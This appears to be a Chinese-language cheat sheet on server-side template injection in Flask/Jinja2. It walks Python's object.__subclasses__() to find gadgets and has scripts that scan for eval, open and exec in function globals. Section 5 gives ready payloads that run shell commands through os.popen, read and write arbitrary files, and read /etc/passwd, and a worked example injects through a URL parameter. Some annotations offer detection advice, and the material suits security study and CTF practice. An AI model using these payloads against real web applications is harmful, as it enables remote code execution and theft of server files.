一 flask
1、基本用法
>>> [].__class__.__base__
（输出：object 类；原文中类的 repr 在抽取时被剥离，下同）
>>> [].__class__.__mro__
（输出：(list, object) 两个类组成的元组）
>>> [].__class__.__bases__
（输出：(object,) 单元素元组）
2、取子类
# Four equivalent ways to reach object.__subclasses__() starting from a list literal.
# list has a single base, so __base__, __bases__[0] and __bases__[-1] are all object;
# object is always the last entry of any MRO, so __mro__[-1] is object as well.
# NOTE(review): the returned list is every class currently loaded in the process;
# its length and ordering differ between interpreter versions and processes, so a
# detection rule should key on the attribute names used here rather than on indices.
[].__class__.__base__.__subclasses__()
[].__class__.__bases__[0].__subclasses__()
[].__class__.__bases__[-1].__subclasses__()
[].__class__.__mro__[-1].__subclasses__()
3、findpayload
# print("1:","".__class__) # print("2:","".__class__.__bases__) # print("3","".__class__.__mro__) # print("4","".__class__.__bases__[0].__subclasses__()) # for m in "".__class__.__bases__[0].__subclasses__(): # print(m) # for c in [].__class__.__base__.__subclasses__(): # if (c.__name__=='catch_warnings'): # print( c.__init__.__globals__['__builtins__']) def find_payload(): #"".__class__.__mro__[-1].__subclasses__() ====> "".__class__.__bases__[0].__subclasses__() for i,item in enumerate("".__class__.__bases__[0].__subclasses__()): # print(i,item) try: if "os" in item.__init__.__globals__: print("os:",i,item) # print(item.__init__.__globals__['os'].system("dir ./")) # print(item.__init__.__globals__['os'].popen('ls').read()) # break if "builtins" in item.__init__.__globals__: print("builtins:",i,item) # print(item.__init__.__globals__['builtins'].eval("__import__('os').popen('dir ').read()")) # print(item.__init__.__globals__['builtins'].eval("__import__('os').system('ls')")) if 'linecache' in item.__init__.__globals__.keys(): print("linecache:", i, item) except Exception as e: pass def find_eval(): for i,item in enumerate("".__class__.__bases__[0].__subclasses__()): # if item.__name__ == 'catch_warnings': if item.__name__=='catch_warnings': # print(item) # for key,b in item.__init__.__globals__.items(): for b in item.__init__.__globals__.values(): if b.__class__ == {}.__class__: # print(b.__class__) if 'eval' in b.keys(): # print(b.keys()) # print(b["eval"]) print(b["eval"]('__import__("os").popen("whoami").read()')) # print(b["eval"]) #print(b) # print(key) def test(): for i ,index in enumerate("".__class__.__mro__[-1].__subclasses__()): try: if "builtins" in str(index.__init__.__globals__): print(i,index.__init__.__globals__["builtins"]) print(i, index.__init__.__globals__.items()) # print(index.__init__.__globals__['builtins'].eval("__import__('os').popen('dir ').read()")) break except: pass if __name__ == '__main__': # find_eval() # find_payload() test()
4、search
#!C:\Python3.7
# -*- coding:utf-8 -*-
# Gadget scanner for Jinja2 SSTI: walks object.__subclasses__(), checks a list of
# dunder attributes on each class, and for every attribute that is a Python-level
# function looks into its __globals__["__builtins__"] for eval/open/exec.
# With pay != 1 it prints class/attribute/function triples; with pay == 1 it prints
# a ready-made template string whose argument is left as the literal placeholder
# "[evil]".
# Defender's view: the template it emits puts __subclasses__, __globals__ and
# __builtins__ back to back, which is a compact signature for request logging or
# WAF rules. The scan only matters because Template()/render_template_string()
# with user-controlled *source* reaches the same objects; keep user data in
# template variables, never in template text.
from flask import Flask      # unused below; kept from the original script
from jinja2 import Template  # unused below; kept from the original script

# Some of special names: dunder attributes that may be Python functions
# (and therefore carry a __globals__ mapping).
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']
# builtins whose presence makes a class usable as a gadget
neededFunction = ['eval', 'open', 'exec']
# 1 = print template strings, anything else = print names only
pay = int(input("Payload?[1|0]"))
# pay = int(input("http://127.0.0.1:5000/?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
    for attr in searchList:
        if hasattr(i, attr):
            # The repr of a Python-level function starts with the word "function"
            # right after the opening bracket; slot wrappers and methods do not.
            # The eval here is just a roundabout str(getattr(i, attr)).
            if eval('str(i.'+attr+')[1:9]') == 'function':
                for goal in neededFunction:
                    # NOTE(review): assumes __globals__["__builtins__"] is a dict.
                    # For functions defined in __main__ CPython stores the builtins
                    # module there instead, so .keys() would raise AttributeError;
                    # there is no try/except around this loop.
                    if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):
                        if pay != 1:
                            print(i.__name__,":", attr, goal)
                        else:
                            # "[evil]" is a placeholder, not an argument that runs
                            print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")
5、payload
python3
#命令执行:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
#文件操作
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
python2
#注入变量执行命令详见 http://www.freebuf.com/articles/web/98928.html
#读文件:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
#写文件:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}
6、案例
从0-1书中python-ssti
网址:https://blog.csdn.net/weixin_/article/details/?spm=1001.2014.3001.5501
1、显示子类
输入:?password={{"".__class__.__bases__[0].__subclasses__()}}
输出: [ …（object 的全部子类列表；每个条目原为类的 repr，抽取时被剥离，只剩下逗号。列表的内容和顺序取决于目标环境的 Python 版本及已加载的模块）… ]